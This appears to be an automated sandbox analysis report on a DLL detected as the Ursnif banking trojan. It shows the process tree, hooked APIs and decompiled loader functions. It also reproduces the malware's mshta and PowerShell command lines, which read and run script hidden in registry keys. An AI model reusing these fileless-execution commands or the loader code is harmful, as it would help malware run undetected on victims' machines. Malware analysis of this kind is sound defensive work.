                              CreateProcessAsUserWEAT7FFA9B33521C
                              CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                              CreateProcessWEAT7FFA9B335200
                              CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                              CreateProcessAEAT7FFA9B33520E
                              CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: loaddll32.exe PID: 4632 Parent PID: 5664

                              General

                              Start time:16:51:08
                              Start date:05/07/2021
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\3a94.dll'
                              Imagebase:0x100000
                              File size:116736 bytes
                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: cmd.exe PID: 4196 Parent PID: 4632

                              General

                              Start time:16:51:09
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
                              Imagebase:0x150000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: rundll32.exe PID: 5444 Parent PID: 4632

                              General

                              Start time:16:51:09
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Seasonthing
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: rundll32.exe PID: 5652 Parent PID: 4196

                              General

                              Start time:16:51:09
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\3a94.dll',#1
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418720560.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418659706.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418632561.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418768006.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.444948435.00000000051CC000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418736133.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418683984.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418753102.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.432262263.0000000005349000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418703457.00000000053C8000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:high

                              Chronological Activities

                              Analysis Process: rundll32.exe PID: 3336 Parent PID: 4632

                              General

                              Start time:16:51:13
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Seatforce
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: rundll32.exe PID: 5528 Parent PID: 4632

                              General

                              Start time:16:51:18
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Spaceclose
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: rundll32.exe PID: 996 Parent PID: 4632

                              General

                              Start time:16:51:23
                              Start date:05/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\3a94.dll,Time
                              Imagebase:0x2d0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: iexplore.exe PID: 4580 Parent PID: 792

                              General

                              Start time:16:52:43
                              Start date:05/07/2021
                              Path:C:\Program Files\internet explorer\iexplore.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                              Imagebase:0x7ff703480000
                              File size:823560 bytes
                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: iexplore.exe PID: 6424 Parent PID: 4580

                              General

                              Start time:16:52:43
                              Start date:05/07/2021
                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17410 /prefetch:2
                              Imagebase:0xe20000
                              File size:822536 bytes
                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: iexplore.exe PID: 5936 Parent PID: 4580

                              General

                              Start time:16:52:48
                              Start date:05/07/2021
                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17422 /prefetch:2
                              Imagebase:0xe20000
                              File size:822536 bytes
                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: iexplore.exe PID: 5168 Parent PID: 4580

                              General

                              Start time:16:52:55
                              Start date:05/07/2021
                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4580 CREDAT:17428 /prefetch:2
                              Imagebase:0xe20000
                              File size:822536 bytes
                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: mshta.exe PID: 2264 Parent PID: 3472

                              General

                              Start time:16:53:02
                              Start date:05/07/2021
                              Path:C:\Windows\System32\mshta.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Gpk8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gpk8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                              Imagebase:0x7ff71e630000
                              File size:14848 bytes
                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: powershell.exe PID: 1384 Parent PID: 2264

                              General

                              Start time:16:53:05
                              Start date:05/07/2021
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                              Imagebase:0x7ff617cb0000
                              File size:447488 bytes
                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 6844 Parent PID: 1384

                              General

                              Start time:16:53:06
                              Start date:05/07/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7ecfc0000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Disassembly

                              Code Analysis

                              Reset < >

                                Analysis Process: loaddll32.exe PID: 4632 Parent PID: 5664 loaddll32.exeCOMMON

                                Executed Functions

                                Function 6DDCE801, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,00000995,00003000,00000040,00000995,6DDCE250), ref: 6DDCE8BE
                                • VirtualAlloc.KERNEL32(00000000,0000006C,00003000,00000040,6DDCE2B3), ref: 6DDCE8F5
                                • VirtualAlloc.KERNEL32(00000000,0000E3F3,00003000,00000040), ref: 6DDCE955
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DDCE98B
                                • VirtualProtect.KERNEL32(6DD40000,00000000,00000004,6DDCE7E0), ref: 6DDCEA90
                                • VirtualProtect.KERNEL32(6DD40000,00001000,00000004,6DDCE7E0), ref: 6DDCEAB7
                                • VirtualProtect.KERNEL32(00000000,?,00000002,6DDCE7E0), ref: 6DDCEB84
                                • VirtualProtect.KERNEL32(00000000,?,00000002,6DDCE7E0,?), ref: 6DDCEBDA
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DDCEBF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.495143690.000000006DDCE000.00000040.00020000.sdmp, Offset: 6DDCE000, based on PE: false
                                Similarity
                                • API ID: Virtual$Protect$Alloc$Free
                                • String ID:
                                • API String ID: 2574235972-0
                                • Opcode ID: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
                                • Instruction ID: 71c115430c3b3462b936112830475373405685f66557232930530127c1819d76
                                • Opcode Fuzzy Hash: c0946dfdec6311ad968fb05df371b2da3969ec27e83de0aba38451b992102b3d
                                • Instruction Fuzzy Hash: 55D160B2500502DFDB26DF44C8A1B5277BAFF48312F194194ED0A9F7EAD770A822CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41144, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 69%
                                			E6DD41144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6DD42210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6dd441d0;
				_push(_t15 + 0x6dd4505e);
				_push(_t15 + 0x6dd45054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6DD4220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6dd441c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                0x6dd41144
                                0x6dd4114d
                                0x6dd41151
                                0x6dd41157
                                0x6dd4115c
                                0x6dd41161
                                0x6dd41164
                                0x6dd41167
                                0x6dd4116c
                                0x6dd4116d
                                0x6dd41170
                                0x6dd4117b
                                0x6dd41182
                                0x6dd41186
                                0x6dd41188
                                0x6dd41189
                                0x6dd4118c
                                0x6dd41191
                                0x6dd4119b
                                0x6dd4119d
                                0x6dd4119d
                                0x6dd411b1
                                0x6dd411b7
                                0x6dd411bb
                                0x6dd4120b
                                0x6dd411bd
                                0x6dd411c6
                                0x6dd411dc
                                0x6dd411e4
                                0x6dd411f6
                                0x6dd411fa
                                0x00000000
                                0x00000000
                                0x6dd411e6
                                0x6dd411e9
                                0x6dd411ee
                                0x6dd411f0
                                0x6dd411f0
                                0x6dd411d1
                                0x6dd411d3
                                0x6dd411fc
                                0x6dd411fd
                                0x6dd411fd
                                0x6dd411c6
                                0x6dd41213

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?,?), ref: 6DD41151
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6DD41167
                                • _snwprintf.NTDLL ref: 6DD4118C
                                • CreateFileMappingW.KERNELBASE(000000FF,6DD441C0,00000004,00000000,?,?), ref: 6DD411B1
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD411C8
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6DD411DC
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD411F4
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A), ref: 6DD411FD
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6DD4156A,0000000A,?), ref: 6DD41205
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1724014008-0
                                • Opcode ID: 817a7e76302b91d36353824b75ffa31bd3623425a150c20b17c595c23a18eeb9
                                • Instruction ID: 84863663975d650d279791ec4d284cdc5aac01551be7728b7134590b00ade6e8
                                • Opcode Fuzzy Hash: 817a7e76302b91d36353824b75ffa31bd3623425a150c20b17c595c23a18eeb9
                                • Instruction Fuzzy Hash: 49217FB2A80109BFEB11BF98CC85FAE7BB8EB4A354F118225F621D7141D77099958B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 72%
                                			E6DD41B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6DD41EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                0x6dd41ba5
                                0x6dd41bac
                                0x6dd41bad
                                0x6dd41bae
                                0x6dd41baf
                                0x6dd41bb0
                                0x6dd41bc1
                                0x6dd41bc5
                                0x6dd41bd9
                                0x6dd41bdc
                                0x6dd41bdf
                                0x6dd41be6
                                0x6dd41be9
                                0x6dd41bf0
                                0x6dd41bf3
                                0x6dd41bf6
                                0x6dd41bf9
                                0x6dd41bfe
                                0x6dd41c39
                                0x6dd41c00
                                0x6dd41c03
                                0x6dd41c09
                                0x6dd41c0e
                                0x6dd41c12
                                0x6dd41c30
                                0x6dd41c14
                                0x6dd41c1b
                                0x6dd41c29
                                0x6dd41c29
                                0x6dd41c12
                                0x6dd41c41

                                APIs
                                • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 6DD41BF9
                                  • Part of subcall function 6DD41EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6DD41C0E,00000002,00000000,?,?,00000000,?,?,6DD41C0E,00000000), ref: 6DD41EF4
                                • memset.NTDLL ref: 6DD41C1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID: @
                                • API String ID: 2533685722-2766056989
                                • Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
                                • Instruction ID: 8128e45baf53fcd79e9aa7c1f6f4515594cd3e8f86d51b3ca90c7fa89ba53e54
                                • Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
                                • Instruction Fuzzy Hash: 172108B6D0020DAFDB01DFA9C9849DEFBB9FB48354F108829E615F3210D735AA558B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41E8A, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E6DD41E8A(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                                0x6dd41e8e
                                0x6dd41e9f
                                0x6dd41ea7
                                0x6dd41ea9
                                0x6dd41ebc
                                0x6dd41ebc
                                0x6dd41ec6

                                APIs
                                • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6DD41B27,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41E9F
                                • GetSystemDefaultUILanguage.KERNEL32(?,?,6DD41B27,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41EA9
                                • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6DD41B27,?,6DD41CE6,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41EBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: Language$DefaultInfoLocaleNameSystem
                                • String ID:
                                • API String ID: 3724080410-0
                                • Opcode ID: 3b3832208ed01aad5e7084933df949055435368eff9c2742166a65af68dac72e
                                • Instruction ID: f3180d258e9e98a478726a95a50874f5195f9caed70ee18f898b903d718108dd
                                • Opcode Fuzzy Hash: 3b3832208ed01aad5e7084933df949055435368eff9c2742166a65af68dac72e
                                • Instruction Fuzzy Hash: F1E04868680205F6E700FB918C06F7972B8970070AF504144F711D60C0D7749E049775
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41F7C, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E6DD41F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6dd441cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                0x6dd41f7c
                                0x6dd41f85
                                0x6dd41f8a
                                0x6dd41f90
                                0x6dd41f99
                                0x6dd41f9f
                                0x6dd41fa1
                                0x6dd41fa4
                                0x6dd41fa9
                                0x6dd41fb0
                                0x6dd41fb0
                                0x6dd41fb4
                                0x6dd41fbc
                                0x6dd41fbf
                                0x00000000
                                0x00000000
                                0x6dd41fc5
                                0x6dd41fcf
                                0x6dd41fd1
                                0x6dd41fd4
                                0x6dd41fd7
                                0x6dd41fdb
                                0x6dd41fe3
                                0x6dd41fe5
                                0x6dd41fe8
                                0x6dd42050
                                0x6dd42050
                                0x6dd42054
                                0x00000000
                                0x00000000
                                0x6dd41fed
                                0x6dd41ff3
                                0x6dd41ff5
                                0x6dd42008
                                0x6dd4200b
                                0x6dd4200b
                                0x6dd4200b
                                0x6dd4200f
                                0x6dd41ff7
                                0x6dd41ff7
                                0x6dd41fff
                                0x6dd42001
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd42001
                                0x6dd41fef
                                0x6dd41fef
                                0x6dd42003
                                0x6dd42003
                                0x6dd42003
                                0x6dd42012
                                0x6dd42015
                                0x6dd42017
                                0x6dd4201e
                                0x6dd42019
                                0x6dd42019
                                0x6dd42019
                                0x6dd42026
                                0x6dd4202c
                                0x6dd4202e
                                0x6dd4205e
                                0x6dd42030
                                0x6dd42030
                                0x6dd42033
                                0x6dd42035
                                0x6dd4203d
                                0x6dd4203d
                                0x6dd42042
                                0x6dd42044
                                0x6dd4204b
                                0x6dd4204d
                                0x6dd4204d
                                0x6dd4204d
                                0x00000000
                                0x6dd4204d
                                0x00000000
                                0x6dd4202e
                                0x6dd41fdd
                                0x6dd41fdf
                                0x6dd41fe1
                                0x00000000
                                0x00000000
                                0x6dd41fe1
                                0x6dd42061
                                0x6dd42061
                                0x6dd42068
                                0x6dd4206d
                                0x00000000
                                0x00000000
                                0x6dd42073
                                0x6dd4207e
                                0x00000000
                                0x6dd4207e
                                0x6dd42075
                                0x6dd42075
                                0x6dd4207b
                                0x00000000
                                0x6dd4207b
                                0x6dd41fa9
                                0x6dd4207f
                                0x6dd42084

                                APIs
                                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6DD41FB4
                                • GetProcAddress.KERNEL32(?,00000000), ref: 6DD42026
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2574300362-0
                                • Opcode ID: b08d2ce191eca5cd73949b2d960bc5962f56e7648250e2cdf7207bd198e215d0
                                • Instruction ID: c57f91cf9e5ef87a3a679953a5628a7542a714a4c148ef7bf086679d8a80befe
                                • Opcode Fuzzy Hash: b08d2ce191eca5cd73949b2d960bc5962f56e7648250e2cdf7207bd198e215d0
                                • Instruction Fuzzy Hash: F6313871A4020ADFEB21EF99C880BAEBBF4FF45348B14806AE855E7245E771DA45CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41EC7, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E6DD41EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
